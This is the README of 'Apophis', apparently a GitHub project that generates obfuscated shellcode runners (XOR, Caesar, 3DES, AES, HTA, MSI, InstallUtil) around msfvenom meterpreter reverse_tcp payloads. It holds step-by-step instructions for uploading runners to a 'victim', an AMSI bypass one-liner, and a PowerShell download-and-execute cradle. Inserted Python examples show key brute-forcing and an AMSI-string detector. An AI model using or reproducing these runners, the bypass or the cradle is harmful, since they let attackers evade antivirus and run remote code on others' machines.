Apophis

Apophis is a Bash script that leverages tools such as DotNetToJScript, ConfuserEx, Net-Obfuscator etc. to generate 'Shellcode runners'.

Description

The Apophis project is a Bash script that leverages tools such as DotNetToJScript, ConfuserEx and Net-Obfuscator to generate 'shellcode runners' in various formats. To do so, it compiles C# templates with the Mono .NET framework.

Apep (also spelled Apepi or Aapep) or Apophis (/əˈpoʊfɪs/;[1] Ancient Greek: Ἄποφις) was the ancient Egyptian deity who embodied chaos (ı͗zft in Egyptian) and was thus the opponent of light and Ma'at (order/truth). He appears in art as a giant serpent. His name is reconstructed by Egyptologists as *ʻAʼpāp(ī), as it was written ꜥꜣpp(y) and survived in later Coptic as Ⲁⲫⲱⲫ Aphōph.[2] Apep was first mentioned in the Eighth Dynasty, and he was honored in the names of the Fourteenth Dynasty king 'Apepi and of the Greater Hyksos king Apophis. - https://en.wikipedia.org/wiki/Apep

What kind of shellcode runners does it generate?

  • XOR (.exe, .dll)
  • Caesar (.exe, .dll)
  • AMSI Bypass (Patching, Unhooking)
  • TripleDES (.exe)
  • ASPX, Web.Config
  • HTA, JS, XSL
  • MSI
  • InstallUtil (.exe)
  • AES + Compression (.exe)
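The XOR and Caesar runners in the list above hide the msfvenom payload behind a single-byte key so the bytes at rest do not match a static signature. The following is an added example (my own Python, not one of the Apophis templates) that implements both encodings and the decode step a runner performs, plus a C# array formatter in the spirit of what gets embedded in a template, and then shows the limitation a practitioner should keep in mind: with a known prologue the key falls out of a 256-try brute force. The "shellcode" is a constructed byte string, not real shellcode; the prologue bytes fc 48 83 e4 f0 e8 c0 00 00 00 are the familiar start of Metasploit's windows/x64 stagers, and the C# formatting is an approximation, not msfvenom's exact output.

```python
# Constructed stand-in for msfvenom output: the common start of Metasploit's
# windows/x64 stagers (cld; and rsp,-0x10; call ...) followed by filler bytes.
# It is NOT real shellcode and does nothing useful if executed.
X64_PROLOGUE = bytes.fromhex("fc4883e4f0e8c0000000")
SAMPLE_SHELLCODE = X64_PROLOGUE + bytes(range(256))


def xor_encode(buf: bytes, key: int) -> bytes:
    """Single-byte XOR, the scheme behind the payloads/XOR runners."""
    return bytes(b ^ key for b in buf)


xor_decode = xor_encode  # XOR with the same key is its own inverse


def caesar_encode(buf: bytes, shift: int) -> bytes:
    """Byte-wise shift modulo 256, the scheme behind the payloads/Caesar runners."""
    return bytes((b + shift) & 0xFF for b in buf)


def caesar_decode(buf: bytes, shift: int) -> bytes:
    return bytes((b - shift) & 0xFF for b in buf)


def to_csharp_array(buf: bytes, name: str = "buf", per_line: int = 16) -> str:
    """Format bytes as a C# byte[] initializer for embedding in a runner template."""
    rows = [", ".join(f"0x{b:02x}" for b in buf[i:i + per_line])
            for i in range(0, len(buf), per_line)]
    body = ",\n".join("    " + row for row in rows)
    return f"byte[] {name} = new byte[{len(buf)}] {{\n{body}\n}};"


def recover_key(blob: bytes, known_prefix: bytes = X64_PROLOGUE):
    """Brute-force the single-byte key of an XOR- or Caesar-encoded blob.

    Tries all 256 keys per scheme and returns (scheme, key) for the first one
    whose decoding of the leading bytes equals `known_prefix`, else None.
    This is why these runners are obfuscation, not protection: the key space
    is 256 and the plaintext start is predictable for msfvenom output.
    """
    head = blob[:len(known_prefix)]
    for key in range(256):
        if xor_decode(head, key) == known_prefix:
            return ("xor", key)
    for shift in range(256):
        if caesar_decode(head, shift) == known_prefix:
            return ("caesar", shift)
    return None


if __name__ == "__main__":
    encoded = xor_encode(SAMPLE_SHELLCODE, 0x35)
    print(to_csharp_array(encoded[:32]))
    print("recovered from XOR blob:   ", recover_key(encoded))
    print("recovered from Caesar blob:", recover_key(caesar_encode(SAMPLE_SHELLCODE, 0x2b)))
```

The recovery step is the same check a sandbox or an analyst's script applies to a suspicious .NET assembly's embedded array: if any of 512 cheap transformations of the first ten bytes yields a known stager prologue, the whole payload is exposed. That is the reason the project also offers 3DES and AES variants, whose keys cannot be brute-forced this way (though, as noted further down, their default key material is published).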

Installation

Apophis relies heavily on the Mono project to compile the C# templates.

sudo apt-get install mono-complete

If your Kali host can't fetch the package (for example because apt can't resolve archive.kali.org, or the archive key is missing or stale), re-import the Kali archive key and retry. Note that apt-key is deprecated on current Debian-based releases and may only print a warning; the commands are kept as the README gives them.

wget -q -O - https://archive.kali.org/archive-key.asc | sudo apt-key add -
sudo apt update
sudo apt-get install mono-complete
git clone https://github.com/tasox/Apophis
cd Apophis
chmod +x apophis.sh
./apophis.sh

Download Wix binaries (MUST be fixed - Currently not working)

To generate an .MSI wrapper, you first need to download wix311-binaries.zip and unzip it under the Templates/MSI directory.

Note: The folder MUST be named wix311-binaries, so unzip into a directory of that name.

cd Templates/MSI/
wget https://github.com/wixtoolset/wix3/releases/download/wix3112rtm/wix311-binaries.zip
unzip wix311-binaries.zip -d wix311-binaries
cd wix311-binaries

┌──(kali㉿kali)-[~/…/Templates/MSI/wix311-binaries]
└─$ ls -ltr
total 14388
-rw-r--r--  1 kali kali    3369 Sep 15  2019 LICENSE.TXT
-rw-r--r--  1 kali kali  169832 Sep 15  2019 mergemod.dll
-rw-r--r--  1 kali kali  501248 Sep 15  2019 mergemod.cub
-rw-r--r--  1 kali kali    4233 Sep 15  2019 lux.targets
-rw-r--r--  1 kali kali  694784 Sep 15  2019 darice.cub
-rw-r--r--  1 kali kali   61952 Sep 15  2019 mspatchc.dll
...

The Wix binary that generates your .MSI file (light.exe) needs msi.dll. For this reason you need to install Wine (if you don't have it already) or update it to the latest version, to avoid errors related to msi.dll.

Installing/Updating Wine on Kali

Method 1

# The WineHQ repository is signed; import its key before adding the binary (not deb-src) repository
wget -O - -q https://dl.winehq.org/wine-builds/winehq.key | apt-key add -
echo "deb https://dl.winehq.org/wine-builds/debian/ buster main" >> /etc/apt/sources.list
apt update
# WineHQ's own packages are named winehq-stable / winehq-devel; 'wine' is the distribution package
apt install wine
winecfg

Method 2

# Enable 32 bit architecture
sudo dpkg --add-architecture i386

wget -O- -q https://download.opensuse.org/repositories/Emulators:/Wine:/Debian/Debian_10/Release.key | sudo apt-key add -
echo "deb http://download.opensuse.org/repositories/Emulators:/Wine:/Debian/Debian_10 ./" | sudo tee -a /etc/apt/sources.list
sudo apt update

# If the 'wine' package doesn't work, install 'winehq-stable' instead
sudo apt install wine

# Get 'wine' version
wine --version

# Download wine-mono (pick the .msi that matches your Wine version)
wget https://dl.winehq.org/wine/wine-mono/<choose the correct package>

# Open Wine's Add/Remove Programs GUI
wine64 uninstaller

# Press Install in the GUI
# Choose the wine-mono .msi installer that you downloaded in the previous step.

# You have installed Mono for Wine. Done :)

Usage

Folders

| Name | Description |
| --- | --- |
| Templates | Shellcode runner templates, with and without encryption, in various formats. |
| payloads | Generated shellcode runners, ready to be executed. |
| ConfuserEx | Compiled files of the ConfuserEx GitHub project. |
| Net-Obfuscate | Compiled files of the Net-Obfuscate GitHub project. |

Static Variables (need to be modified)

Open apophis.sh in a text editor and set the following variables before running it.

| Variable | Description |
| --- | --- |
| PROCESS_TO_INJECT | Name of the remote process to inject into. |
| MSFVENOM_PAYLOAD | msfvenom payload to generate. |
| LHOST | Listener IP |
| LPORT | Listener port |

#!/bin/bash
...
PROCESS_TO_INJECT="explorer"
MSFVENOM_PAYLOAD="windows/x64/meterpreter/reverse_tcp"
LHOST="192.168.100.128"
LPORT=443
...

Payload prefixes

| Name | Description |
| --- | --- |
| _embedded | In payloads/3DES/, a generated payload whose name contains embedded carries the shellcode inside the runner itself. |
| _marshal | A payload whose name contains marshal injects the shellcode into the runner's own address space. |
| _numa | A payload whose name contains numa uses VirtualAllocExNuma instead of VirtualAllocEx. |
| _FlsAlloc | A payload whose name contains FlsAlloc uses the FlsAlloc API. |

Payload Example

When a payload is generated with the name shellcode_runner_assembly_FlsAlloc_marshal.exe, it means:

  • the FlsAlloc API was used;
  • the shellcode will be injected into the executable's own address space (not into a remote process).

┌──(kali㉿kali)-[~/…/payloads/XOR]
└─$ ls -la
total 144
drwxr-xr-x 2 kali kali  4096 Mar 10 02:45 .
drwxr-xr-x 9 kali kali  4096 Feb  2 08:20 ..
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly.dll
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly.exe
-rwxr-xr-x 1 kali kali  5120 Mar 10 02:45 shellcode_runner_assembly_FlsAlloc_marshal.dll
-rwxr-xr-x 1 kali kali  5120 Mar 10 02:45 shellcode_runner_assembly_FlsAlloc_marshal.exe
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa.dll
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa.exe
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa_marshal.dll
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa_marshal.exe
-rwxr-xr-x 1 kali kali 65131 Mar 10 02:45 shellcode_runner_cpp.exe
-rwxr-xr-x 1 kali kali  6144 Jan 24 23:05 shellcode_runner.dll


1. Shellcode Runners

1.1 Triple DES

The 3DES shellcode runners are located under the payloads/3DES/ directory with the names:

  • des_decryptor.exe
  • des_decryptor_embedded.exe
  • des_decryptor_embedded_marshal.exe

Password, salt and IV are static values, but you can modify them as needed. Note that the defaults below ship in the public repository, so anyone who obtains a runner can decrypt its shellcode with them; change all three before use.

  • Password: oqphnbt0kuedizy4m3avx6r5lf21jc8s
  • Salt: vh9b4tsxrl1560wg8nda2meuc7yjzop3
  • InitialVector: SBFTWSDXBYVOEMTD

1.1.1 Execution of des_decryptor.exe (needs the path of a shellcode runner)

The executable des_decryptor.exe does not contain shellcode itself, so a shellcode runner has to be supplied on the command line. There are two 3DES-encrypted shellcode runners that you can host on either a web or an SMB server:

  • des_decryptor_embedded.exe (injects the shellcode into the remote process set on line 11 of apophis.sh)
  • des_decryptor_embedded_marshal.exe (injects the shellcode into the des_decryptor.exe process itself)

Steps

  • Copy any 3DES Shellcode runner that is located under payloads/3DES/ to your Web/SMB Server
  • Upload des_decryptor.exe to victim
  • Execute it as follows
cmd> des_decryptor.exe http://KALI_IP/des_decryptor_embedded.exe
cmd> des_decryptor.exe smb://KALI_IP/des_decryptor_embedded.exe

cmd> des_decryptor.exe http://KALI_IP/des_decryptor_embedded_marshal.exe
cmd> des_decryptor.exe smb://KALI_IP/des_decryptor_embedded_marshal.exe

1.1.2 Execution of des_decryptor_embedded.exe

The executable des_decryptor_embedded.exe embeds the shellcode in base64, encrypted beforehand with TripleDESEncryptor.ps1. It needs no command-line arguments.

It injects the shellcode into the remote process set on line 11 of apophis.sh.

Steps

  • Upload the file to the victim
  • Execute it as follows:
cmd> des_decryptor_embedded.exe

1.1.3 Execution of des_decryptor_embedded_marshal.exe

The executable des_decryptor_embedded_marshal.exe embeds the shellcode in base64, encrypted beforehand with TripleDESEncryptor.ps1. It needs no command-line arguments.

It injects the shellcode into the address space of the des_decryptor_embedded_marshal.exe process itself.

Steps

  • Upload the file to the victim
  • Execute it as follows:
cmd> des_decryptor_embedded_marshal.exe

1.2 AMSI Bypass

There are two methods to bypass AMSI:

  • Patching
  • Unhooking

Nice resource to have:

  • https://amsi.fail/

1.2.1 Method 1 (Patching)

The first method (patching) is straightforward and uses a well-known technique: set the non-public static field amsiInitFailed of AmsiUtils to true via reflection, so AMSI behaves as if initialization failed and skips scanning for the rest of the session. The split strings ("Ams"+"iUtils", 'amsiInitFai'+'led') exist only to keep the literal identifiers out of the script text.

$m="System.Management.Automation.Ams";[Ref].Assembly.GetType("$m"+"iUtils").GetField('amsiInitFai'+'led','NonPublic,Static').SetValue($null,$true)

Alternatively, patch AMSI's scanning function in memory; the README gives only the opening bytes of that patch:

# XOR RAX,RAX 
$buf = [Byte[]] (0x48,0x31,0xC0)  

Execute AMSI Shellcode runner

You can copy the payloads/AMSI/shellcode_runner.txt to your web server as shellcode_runner.html

powershell -nop -exec bypass -c IEX((New-Object Net.WebClient).DownloadString('http://<IP>/shellcode_runner.html')); 
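The reason the one-liner above concatenates its strings is that simple content matching looks for the joined identifiers. The following added example (my own Python, not part of Apophis or AmsiHooker) is a minimal detection-side normalizer that folds two cheap PowerShell obfuscations, variable expansion inside double-quoted strings and '+' concatenation of literals, before matching, so the obfuscated form is caught as well as the plain one. The three sample scripts are constructed; the indicator list is an assumed minimal set, not a complete rule. It only covers the script-text form of the bypass: the in-memory byte patch (0x48,0x31,0xC0) leaves nothing in the script for this to match and has to be caught at the memory or ETW level instead.

```python
import re

# Constructed samples (the first reproduces the one-liner quoted in this README).
OBFUSCATED = ('$m="System.Management.Automation.Ams";'
              '[Ref].Assembly.GetType("$m"+"iUtils")'
              ".GetField('amsiInitFai'+'led','NonPublic,Static').SetValue($null,$true)")
PLAIN = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
         ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")
BENIGN = '$p="C:\\Temp"; Get-ChildItem "$p\\*.log" | Select-Object -First 5'

# Assumed minimal indicator list; compared case-insensitively because
# PowerShell identifiers and .NET reflection lookups here are case-insensitive.
INDICATORS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer")

_STR = r'(?:"[^"]*"|\'[^\']*\')'                        # one string literal
_ASSIGN = re.compile(r'\$(\w+)\s*=\s*(["\'])(.*?)\2')   # $name = "literal"
_DQ = re.compile(r'"([^"]*)"')                          # a double-quoted string
_CONCAT = re.compile(rf'{_STR}(?:\s*\+\s*{_STR})+')     # 'a' + "b" + 'c'


def normalize(script: str) -> str:
    """Fold two cheap obfuscations back into literal strings:
    1. $var expansion inside double-quoted strings, for vars assigned a literal;
    2. '+' concatenation of adjacent string literals.
    Deliberately simple: no real tokenizer, no format operator, no Invoke-Expression.
    """
    variables = {name: value for name, _quote, value in _ASSIGN.findall(script)}

    def expand(match):
        body = re.sub(r'\$(\w+)',
                      lambda v: variables.get(v.group(1), v.group(0)),
                      match.group(1))
        return '"' + body + '"'

    def fold(match):
        parts = re.findall(_STR, match.group(0))
        return "'" + "".join(p[1:-1] for p in parts) + "'"

    return _CONCAT.sub(fold, _DQ.sub(expand, script))


def raw_indicators(script: str) -> list:
    """What a naive substring scanner sees, without normalization."""
    text = script.lower()
    return [needle for needle in INDICATORS if needle in text]


def amsi_indicators(script: str) -> list:
    """Indicators present after normalization, in INDICATORS order."""
    text = normalize(script).lower()
    return [needle for needle in INDICATORS if needle in text]


if __name__ == "__main__":
    for label, sample in (("obfuscated", OBFUSCATED), ("plain", PLAIN), ("benign", BENIGN)):
        print(f"{label:10s} raw={raw_indicators(sample)} normalized={amsi_indicators(sample)}")
```

Running it shows the point of the split strings: the naive scan finds nothing in the obfuscated sample, while after folding it yields the same two indicators as the plain form. Real AMSI content scanning and script-block logging operate on the de-obfuscated script block at execution time, which is why the amsi.fail variants keep changing rather than relying on string splitting alone.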

1.2.2 Method 2 (Unhooking)

To unhook AMSI, I used the AmsiHooker project by jfmaes (https://github.com/jfmaes/AmsiHooker) with some small modifications. When the AmsiHooker executable is launched, it downloads the shellcode runner from your web server and executes it reflectively.

Steps 1.

View on GitHub: https://github.com/tasox/Apophis
GitHub stars: 20 | Forks: 6 | Category: Development | Updated: 6 months ago
Languages: C
Security score: 67/100 (audited on Sep 23, 2025, no findings)